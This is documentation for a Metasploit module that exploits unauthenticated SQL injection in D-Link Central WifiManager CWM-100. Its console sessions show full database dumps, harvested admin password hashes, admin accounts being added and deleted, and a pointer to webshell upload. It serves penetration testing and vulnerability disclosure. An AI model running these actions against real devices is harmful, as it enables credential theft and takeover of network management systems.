dlink_central_wifimanager_sqli.md

/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md

https://github.com/rapid7/metasploit-framework
Markdown | 180 lines | 137 code | 43 blank | 0 comment | 0 complexity | ab266f5494c6742dd2f0569b9b8df75d MD5 | raw file

## Vulnerable Application

This module exploits a vulnerability in Dlink Central
WifiManager (CWM-100), found in versions lower than
v1.03R0100_BETA6, allowing unauthenticated users to
execute arbitary SQL queries.

This module has 3 actions:

| Action        | Description                |
| ------------- | -------------------------- |
| SQLI_DUMP     | Data retrieval*            |
| ADD_ADMIN     | Creation of an admin user  |
| REMOVE_ADMIN  | Removal of an admin user   |

\* : each table is saved in the loot directory in CSV format, credentials (password hashes) are saved as
creds for future cracking.

Has been tested with 1.03r098.

## Verification Steps

1. Download the vulnerable software, and install it
- Run the vulnerable software, downloadable from
  [here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117).
- direct download link:
  `ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip
2. Reproduction steps
- Run `msfconsole`
- set rhosts ...
- set action ...
- `check` or `exploit`
- should work as in the scenarios below

## Actions

```
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show actions

Auxiliary actions:

   Name         Description
   ----         -----------
   ADD_ADMIN    Add an administrator user
   REMOVE_ADMIN Remove a user
   SQLI_DUMP    Retrieve all the data from the database

```

## Options

```
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show options

Module options (auxiliary/sqli/dlink/dlink_central_wifimanager_sqli):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   Admin_Password  anything         no        The password of the user to add/edit
   Admin_Username  red0xff          no        The username of the user to add/remove
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.223    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           443              yes       The target port (TCP)
   SSL             true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI       /                yes       The base path to DLink CWM-100
   VHOST                            no        HTTP server virtual host

```

## Scenarios

This module has both `check` and `run` functions.

### Retrieving all the data from the database

```
msf5 > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli 
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action SQLI_DUMP 
action => SQLI_DUMP
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set rhosts 192.168.1.223
rhosts => 192.168.1.223
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > check 

[+] 192.168.1.223:443 - The target is vulnerable.
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223

[+] Target seems vulnerable
[+] DBMS version: PostgreSQL 9.1.0, compiled by Visual C++ build 1500, 32-bit
[*] Enumerating tables
[+] grouptossltable saved to /home/redouane/.msf4/loot/20200828180148_default_192.168.1.223_dlink.http_187571.csv
[+] paypalsettingtable saved to /home/redouane/.msf4/loot/20200828180149_default_192.168.1.223_dlink.http_642251.csv
[+] ordertable saved to /home/redouane/.msf4/loot/20200828180149_default_192.168.1.223_dlink.http_944954.csv

...

[+] tempstationtable saved to /home/redouane/.msf4/loot/20200828180505_default_192.168.1.223_dlink.http_577215.csv
[+] Saved credentials for admin
[+] Saved credentials for red0xff
[+] usertable saved to /home/redouane/.msf4/loot/20200828180153_default_192.168.1.223_dlink.http_608945.csv

...

[+] devicesnmpsecuritytable saved to /home/redouane/.msf4/loot/20200828180154_default_192.168.1.223_dlink.http_825556.csv
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > 
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > creds
Credentials
===========

host  origin         service  public   private                           realm  private_type        JtR Format
----  ------         -------  ------   -------                           -----  ------------        ----------
      192.168.1.223           admin    21232f297a57a5a743894a0e4a801fc3         Nonreplayable hash  raw-md5
      192.168.1.223           red0xff  f0e166dc34d14d6c228ffac576c9a43c         Nonreplayable hash  raw-md5

msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > 
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > loot

Loot
====

host           service  type        name                         content          info  path
----           -------  ----        ----                         -------          ----  ----
192.168.1.223           dlink.http  biggrouptable.csv            application/csv        /home/redouane/.msf4/loot/20200828180503_default_192.168.1.223_dlink.http_360290.csv
192.168.1.223           dlink.http  devicetable.csv              application/csv        /home/redouane/.msf4/loot/20200828180503_default_192.168.1.223_dlink.http_230830.csv

...

ult_192.168.1.223_dlink.http_878195.csv
192.168.1.223           dlink.http  devicesnmpsecuritytable.csv  application/csv        /home/redouane/.msf4/loot/20200828180506_default_192.168.1.223_dlink.http_086271.csv

msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > 
```

### Adding an admin user/changing the password of a user

```
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action ADD_ADMIN 
action => ADD_ADMIN
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username msfadmin
Admin_Username => msfadmin
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfadmin
Admin_Password => msfadmin
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223

[+] Target seems vulnerable
[*] User not found on the target, inserting
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfpassword
Admin_Password => msfpassword
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223

[*] Trying to detect installed version
[+] Target seems vulnerable
[*] User already exists, updating the password
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > 
```

### Deleting an administrator user

```
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action REMOVE_ADMIN 
action => REMOVE_USER
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username red0xff
Admin_Username => red0xff
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223

[+] Target seems vulnerable
[*] Auxiliary module execution completed
```

### Going further

It is possible to upload arbitary files to the target system using queries of the form
(copy ... to ...), but using full paths, the attacker must know the path of the webroot
to upload a webshell this way.